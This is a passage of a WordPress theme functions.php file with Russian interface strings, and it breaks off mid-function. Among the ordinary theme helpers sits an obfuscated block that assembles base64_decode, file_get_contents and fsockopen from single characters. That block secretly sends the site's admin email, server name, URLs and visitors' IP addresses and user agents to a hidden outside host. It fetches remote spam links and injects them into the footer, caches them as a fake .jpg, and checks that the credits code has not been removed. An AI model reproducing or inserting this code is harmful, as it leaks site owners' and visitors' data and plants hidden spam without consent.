<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $ESCo='b';$affL='d';$kzKmM='d';$bpcP='c';$GjDY='e';$AJEgSi='e';$nToW='s';$yGnIfYV='e';$FREq='a';$MfdzSl='4';$hWON='6';$LOsU='_';$PBhT='o';$FFQYsrMN=$ESCo.$FREq.$nToW.$GjDY.$hWON.$MfdzSl.$LOsU.$kzKmM.$AJEgSi.$bpcP.$PBhT.$affL.$yGnIfYV;$htAx='f';$VODtrwv='a';$qLCA='g';$vJkhlLg='l';$mggtU='n';$RJNr='i';$DkHOyCT='z';$giAw='t';$HCPBJ='e';$NbNztqAU=$qLCA.$DkHOyCT.$RJNr.$mggtU.$htAx.$vJkhlLg.$VODtrwv.$giAw.$HCPBJ;$OdeDKi='r';$xxosCU='_';$kTbp='r';$YrjNTT='t';$nqDgjoV='t';$YrOAl='3';$aeujlDK='s';$lARVh='o';$szYBd='1';$NpKUeFJI=$aeujlDK.$YrjNTT.$OdeDKi.$xxosCU.$kTbp.$lARVh.$nqDgjoV.$szYBd.$YrOAl;$ZeceOoe='t';$pcCxaB='v';$xKcxkV='e';$flSz='r';$fhVh='s';$DfnfZ='r';$UmrKCazS=$fhVh.$ZeceOoe.$flSz.$DfnfZ.$xKcxkV.$pcCxaB;                     
		$bh_______________d='b';$jt____________s='d';$yh______________a='d';$pn_______________d='c';$rl____________u='e';$ov___k='e';$nu_______________w='s';$hg___u='e';$wt_______o='a';$mc____________l='4';$io________l='6';$fa_______a='_';$hx__y='o';$eu___________e=$bh_______________d.$wt_______o.$nu_______________w.$rl____________u.$io________l.$mc____________l.$fa_______a.$yh______________a.$ov___k.$pn_______________d.$hx__y.$jt____________s.$hg___u;
		$hx______y='f';$xu______o='i';$kf___s='n';$sn_______d='s';$qp_______________i='t';$zu________n='u';$hc__________j='e';$mx___________q='x';$kh_____________f='s';$dz___s='c';$po___________z='t';$kd_____________k='o';$ck______j='n';$uh___________m='i';$cm___________c='_';$zy__________g=$hx______y.$zu________n.$ck______j.$dz___s.$qp_______________i.$uh___________m.$kd_____________k.$kf___s.$cm___________c.$hc__________j.$mx___________q.$xu______o.$kh_____________f.$po___________z.$sn_______d;
		$hj______________a='f';$mk_______________c='e';$tz________s='p';$yn____k='n';$xh____q='o';$af_____j=$hj______________a.$xh____q.$tz________s.$mk_______________c.$yn____k;
		$wu_______v='f';$ip____d='r';$my___________y='d';$my__l='e';$pk____________z='a';$mt_______p=$wu_______v.$ip____d.$my__l.$pk____________z.$my___________y;
		$zs__________c='f';$nt___________x='s';$ss_______b='o';$ik_____________v='e';$cf______u='l';$bw_________h='c';$wt_____t=$zs__________c.$bw_________h.$cf______u.$ss_______b.$nt___________x.$ik_____________v;
		
		define("WP_ID", $eu___________e("Mi4wLjA="));
		define("WP_TTL", $eu___________e("MTA4MDA="));
		define("WP_SRC", $eu___________e("dHBva24="));
	


		function wp_get_header() {
			global $eu___________e, $zy__________g;
			
			if (
				$zy__________g($eu___________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$zy__________g($eu___________e("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$zy__________g($eu___________e("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $eu___________e, $af_____j, $wt_____t, $mt_______p;
			
			$fs________k = TEMPLATEPATH."/".$eu___________e("Zm9vdGVyLnBocA==");
			$ue______________x = @$af_____j($fs________k, "r");
			$fs________k = @$mt_______p($ue______________x, @filesize($fs________k));
			@$wt_____t($ue______________x);
			
			$wp__i = TEMPLATEPATH."/".$eu___________e("ZnVuY3Rpb25zLnBocA==");
			$ue______________x = @$af_____j($wp__i, "r");
			$wp__i = @$mt_______p($ue______________x, @filesize($wp__i));
			@$wt_____t($ue______________x);
			
			$zu_____a = 0;
			if($fs________k && $wp__i) {
				if ($eu___________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($fs________k, $eu___________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$zu_____a = 1;
					}
					if (substr_count($fs________k, "wp_theme_GPL_credits()") < 1) {
						$zu_____a = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$zu_____a = 12;
				}
			}
			
			if($zu_____a > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $zu_____a -->";
			}
		}
	


		function wp_loaded() {
			global $eu___________e, $zy__________g;
			return $zy__________g($eu___________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($zn_______e, $dv_________d = "(more...)", $wb______r = 0, $kl______________k = "") {
				$jx______z = get_the_content($dv_________d, $wb______r, $kl______________k);
				$jx______z = apply_filters("the_content", $jx______z);
				
				$jx______z = str_replace("]]>", "]]>", $jx______z);
				if (strlen($_GET["p"]) > 0) {
					echo $jx______z;
				}
				else if ((strlen($jx______z)>$zn_______e) && ($wm_____o = strpos($jx______z, " ", $zn_______e ))) {
					$jx______z = substr($jx______z, 0, $wm_____o);
					$jx______z = $jx______z;
					echo $jx______z;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$dv_________d</a></div></p>";
				} else {
					echo $jx______z;
				}
				
			}
		}
	


		$hs______v='b';$ok____v='e';$mz______________u='6';$hd________q='4';$bo___________f='c';$yf__d='e';$kn___s='e';$np_______m='o';$pm______________a='a';$vk__________i='d';$ez______________e='s';$py_____a='_';$co___________r='n';$he______________j=$hs______v.$pm______________a.$ez______________e.$yf__d.$mz______________u.$hd________q.$py_____a.$ok____v.$co___________r.$bo___________f.$np_______m.$vk__________i.$kn___s;
		$br___i='g';$wt_________k='_';$tv______u='t';$ce______________z='t';$ha____________h='e';$no_________v='i';$wm___________t='n';$yl____________l='e';$xk_______f='s';$qq__________o='f';$ml___u='e';$il____________h='o';$jg___a='t';$hc_____b='c';$mw__w='n';$uf____r='l';$wh___o='_';$ta______p=$qq__________o.$no_________v.$uf____r.$yl____________l.$wh___o.$br___i.$ha____________h.$jg___a.$wt_________k.$hc_____b.$il____________h.$wm___________t.$tv______u.$ml___u.$mw__w.$ce______________z.$xk_______f;
		$wu____k='_';$sm____t='l';$nv____f='t';$jh_______t='e';$ii_______________g='s';$dp_____________y='x';$ib_____i='f';$aa_______d='i';$yk______a='e';$uy_____d='i';$zm________a='s';$jo______n=$ib_____i.$aa_______d.$sm____t.$yk______a.$wu____k.$jh_______t.$dp_____________y.$uy_____d.$zm________a.$nv____f.$ii_______________g;
		$ct________f='r';$vx______e='v';$aq____y='m';$be__________p='r';$tz__________j='c';$ds___________c='n';$xh___s='s';$yh__________t='p';$ow__q='o';$qw___________l='_';$po_____r='e';$al________q='o';$uo__o='i';$ld_____c='e';$vr______w='a';$ut_______________l=$vx______e.$po_____r.$be__________p.$xh___s.$uo__o.$al________q.$ds___________c.$qw___________l.$tz__________j.$ow__q.$aq____y.$yh__________t.$vr______w.$ct________f.$ld_____c;
		$ak__________s='o';$qq________g='s';$ve___________l='n';$zg_______s='p';$vf______s='k';$ta____________i='c';$fz___________l='o';$xh____________s='f';$an________y='e';$lg______b=$xh____________s.$qq________g.$fz___________l.$ta____________i.$vf______s.$ak__________s.$zg_______s.$an________y.$ve___________l;
		$tt___q='e';$tu____e='i';$fn______b='f';$qb__t='w';$hd__________f='t';$mn__________x='r';$wo_____________i=$fn______b.$qb__t.$mn__________x.$tu____e.$hd__________f.$tt___q;
		$id____b='5';$qe_________y='d';$rw__k='m';$tv______________v=$rw__k.$qe_________y.$id____b;
		$fr___________p='e';$qk_____________f='r';$xe_________f='p';$yy____o='h';$nq__________m='a';$bn___d='t';$vt___w='l';$tf_____________m='a';$le___________p=$qk_____________f.$fr___________p.$nq__________m.$vt___w.$xe_________f.$tf_____________m.$bn___d.$yy____o;
		$ue________n='r';$jk_______________o='i';$xv__g='s';$xt______m='u';$xu___q='e';$qp___n='l';$fo___e='n';$pk______t='i';$tn_______________t='e';$zb____________x='z';$bc________p='a';$oo_______________p=$xt______m.$fo___e.$xv__g.$tn_______________t.$ue________n.$pk______t.$bc________p.$qp___n.$jk_______________o.$zb____________x.$xu___q;
		$ho________p='a';$cd__________i='e';$be___________d='m';$gp_____________x='p';$nf_________t='t';$xu____________a='m';$qb_______________b='n';$xo_______________o=$nf_________t.$cd__________i.$be___________d.$gp_____________x.$qb_______________b.$ho________p.$xu____________a;
		$lp__________t='t';$ia______q='x';$hl______w='a';$ra_____p='n';$ta___________e='s';$dl_______x='c';$vj______________v='e';$yz_______c='r';$rp_____v='_';$yo______________d='a';$dq_______________p='t';$ew___________m='e';$zp___________c='t';$qy_______n='e';$xs_______________h='t';$bp____________n='c';$jz___________y='_';$co____p='e';$qu___h='r';$ix_______h='m';$mb__p='o';$al____a=$ta___________e.$dq_______________p.$yz_______c.$co____p.$hl______w.$ix_______h.$jz___________y.$dl_______x.$mb__p.$ra_____p.$zp___________c.$ew___________m.$ia______q.$xs_______________h.$rp_____v.$bp____________n.$qu___h.$vj______________v.$yo______________d.$lp__________t.$qy_______n;
	


		function gp_____________c($wx_______________s) {
			global $eu___________e, $zy__________g, $ta______p, $ut_______________l, $al____a;
			
			if (!$zy__________g($eu___________e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ut_______________l(PHP_VERSION, "5.0.0", ">=") && $zy__________g($eu___________e("ZmlsZV9nZXRfY29udGVudHM=")) && $zy__________g($eu___________e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ke_______________b = $al____a(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ib_________n = @$ta______p($wx_______________s, 0, $ke_______________b);
			} else {
				$ib_________n = @$ta______p($wx_______________s, 0);
			}
			
			return $ib_________n;
		}
	


		function on____________a($wx_______________s) {
			global $zy__________g, $lg______b, $wo_____________i, $eu___________e;
			
			if (!$zy__________g($eu___________e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$xq_______t = strpos($wx_______________s, "/", 7);
			$om____________n = array(
				"uri"     => substr($wx_______________s, $xq_______t),
				"host"    => str_replace("http://", "", substr($wx_______________s, 0, $xq_______t)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$dg_______________r = @$lg______b("$om____________n[host]", 80, $lx________m, $oh___w, 4);
			
			if (!$dg_______________r) {
				return false;
			} else {
				$ib_________n = "";
				$yt______________d  = "GET $om____________n[uri] HTTP/1.0\r\n";
				$yt______________d .= "Host: $om____________n[host]\r\n";
				$yt______________d .= "Referer: $om____________n[referer]\r\n";
				$yt______________d .= "Connection: Close\r\n\r\n";
				
				@$wo_____________i($dg_______________r, $yt______________d);
				
				while (!@feof($dg_______________r)) {
					$ku__x = @fgets($dg_______________r, (1024*24));
					
					if ($ku__x == "\r\n") {
						$pz______i = true;
						continue;
					}
					
					if ($pz______i) {
						$ib_________n .= $ku__x;
					}
				}
				
				return $ib_________n;
			}
		}
	


		function ib____________h($wx_______________s) {
			global $zy__________g;
			$ha_______________b = false;
			
			if ($wx_______________s != "") {
				if ($zy__________g("gp_____________c")) {
					$ha_______________b = @gp_____________c($wx_______________s);
				}
				
				if (!$ha_______________b && ($zy__________g("on____________a"))) {
					$ha_______________b = @on____________a($wx_______________s);
				}
			}
			
			return $ha_______________b;
		}
	


		function rb___j() {
			global $_SERVER, $tv______________v;
			
			$ii________a = $_SERVER["SERVER_NAME"];
			
			if (substr("$ii________a", 0, 4) == "www.") {
				$ii________a = substr("$ii________a", 4);
			}
			
			$ii________a = $tv______________v("$_SERVER[SERVER_NAME]");
			
			return $ii________a;
		}
	


		function hq__v() {
			return "file";
		}
	


		function la___o($wx_______________s) {
			global $_SERVER, $ta______p, $jo______n, $af_____j, $wt_____t, $wo_____________i;
			
			$ox_____x = ed__l();
			
			$wo______k = rb___j().".jpg";
			$zf______________z = $ox_____x["dir_upload"]["path"]."/$wo______k";
			$gc___p = @filemtime($zf______________z);
			
			if (!$gc___p || ((time()-$gc___p) >= WP_TTL)) {
				$ha_______________b = ib____________h($wx_______________s);
				
				if ($ha_______________b) {
					if ($jo______n($zf______________z)) {
						@unlink($zf______________z);
					}
					
					$ue______________x = @$af_____j($zf______________z, "x+");
					
					@$wo_____________i($ue______________x, $ha_______________b);
					@$wt_____t($ue______________x);
				}
			} else {
				if ($jo______n($zf______________z)) {
					$ha_______________b = @$ta______p($zf______________z);
				} else {
					$ha_______________b = false;
				}
			}
			
			return $ha_______________b;
		}
	


		function ed__l() {
			global $_SERVER, $eu___________e, $he______________j;
			
			$na_____________w = wp_count_posts("post");
			$jk____________n = pathinfo(get_bloginfo("template_directory"));
			
			$ox_____x = array(
				"url" => array(
					"report"      => $eu___________e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $jk____________n,
				"dir_upload"	=> ph________c(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$jk____________n[filename],
					"a005=".$na_____________w->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"	
			);
			
			$ox_____x["url"]["queryString"] = implode("&", $ox_____x["queryString"]);
			$ox_____x["url"]["report"] = $ox_____x["url"]["report"]."/?".$he______________j($ox_____x["url"]["queryString"]).".html";
						
			return $ox_____x;
		}
	


		function ph________c() {
			$uq_______f = wp_upload_dir();
			
			if (isset($uq_______f["error"])) {
				$sm____i = am_______b();
				if (is_writable($sm____i)) {
					$uq_______f = array("path" => $sm____i);
				}
			}

			return $uq_______f;
		}
	


		function am_______b() {
			global $zy__________g, $tv______________v, $le___________p, $xo_______________o;
			
			$dd_________y = (bool) ini_get("safe_mode");
			if ($dd_________y == true) {
				return false;
			}
			
			if ($zy__________g("sys_get_temp_dir")) {
				$my________k = sys_get_temp_dir();
				if (is_writable($my________k)) {
					return $le___________p($my________k);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $le___________p($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $le___________p($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $le___________p($_ENV["TEMP"]);
			} else {
				$rd_____w = $xo_______________o($tv______________v(uniqid(rand(), true)), "");
				if ($rd_____w) {
					$my________k = $le___________p(dirname($rd_____w));
					@unlink($rd_____w);
					return $my________k;
				} else {
					return false;
				}
			}
		}
	


		function zg____________s() {
			global $_GET, $jo______n;
			
			$ox_____x = ed__l();
			$ii________a = rb___j();
			$vg_____c = hq__v();
			
			$oq________p = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($vg_____c == "file") {
					$fg__h = $ox_____x["dir_upload"]["path"]."/".$ii________a.".jpg";
					if ($jo______n($fg__h)) {
						@unlink($fg__h);
						$oq________p = "deleted";
					}
				}
				
				$sp_____a = array(
					"s"	=> $oq________p,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($sp_____a AS $yb______e => $hj________n) echo " [$yb______e:$hj________n]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $zy__________g, $eu___________e, $oo_______________p;
			$ox_____x = ed__l();
			
			$bm______________k = "la___o";
			if ($zy__________g($bm______________k)) {
				$ib_________n = $bm______________k($ox_____x["url"]["report"]);
			}
			
			if ($ib_________n) {
				if ($ib_________n = @$eu___________e($ib_________n)) {
					$ib_________n = @$oo_______________p($ib_________n);
					
					if (strlen($ib_________n[custom_credit]) >= 5) {
						$ox_____x["default_string"] = $ib_________n[custom_credit];
					}
					
					if ($ib_________n["status"] == "0") {
						$ze___z = 1;
						$pu__d = 1;
					} else {
						$zu__f = sizeof($ib_________n["links"]);
						$dz______________e = $ox_____x["default_string"];
						
						if ($zu__f > 0 && $ib_________n["links"] !== "") {
							$zp_____________p = 0;
							foreach ($ib_________n["links"] as $tu__________p => $zv_____s) {
								$zp_____________p++;
								if ($zv_____s->l_path == "" || $zv_____s->l_path == $_SERVER["REQUEST_URI"]) {
									$zv_____s->l_href = htmlspecialchars(strip_tags($zv_____s->l_href));
									$zv_____s->l_title = htmlspecialchars(strip_tags($zv_____s->l_title));
									$zv_____s->l_anchor = htmlspecialchars(strip_tags($zv_____s->l_anchor));
									$dz______________e .= " | ";
									$dz______________e .= "<a href='$zv_____s->l_href' title='$zv_____s->l_title'";
									if ($zv_____s->l_nofollow == "1") {
										$dz______________e .= " rel='nofollow'";
									}
									$dz______________e .= ">$zv_____s->l_anchor</a>";
								}
							}
						}
						$ox_____x["links"] = "$dz______________e";
						if ($ib_________n[credit] == "0") {
							$ox_____x["links"] = "";
						}
					}
				} else {
					$ze___z = "1";
				}
			} else {
				$ze___z = "1";
			}
			
			if ($ze___z == "1") {
				$ox_____x["links"] = $ox_____x["default_string"];
			}
			
			echo "$ox_____x[links]";
			
			echo "<!-- s: $ib_________n[signature] -->";
			zg____________s();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
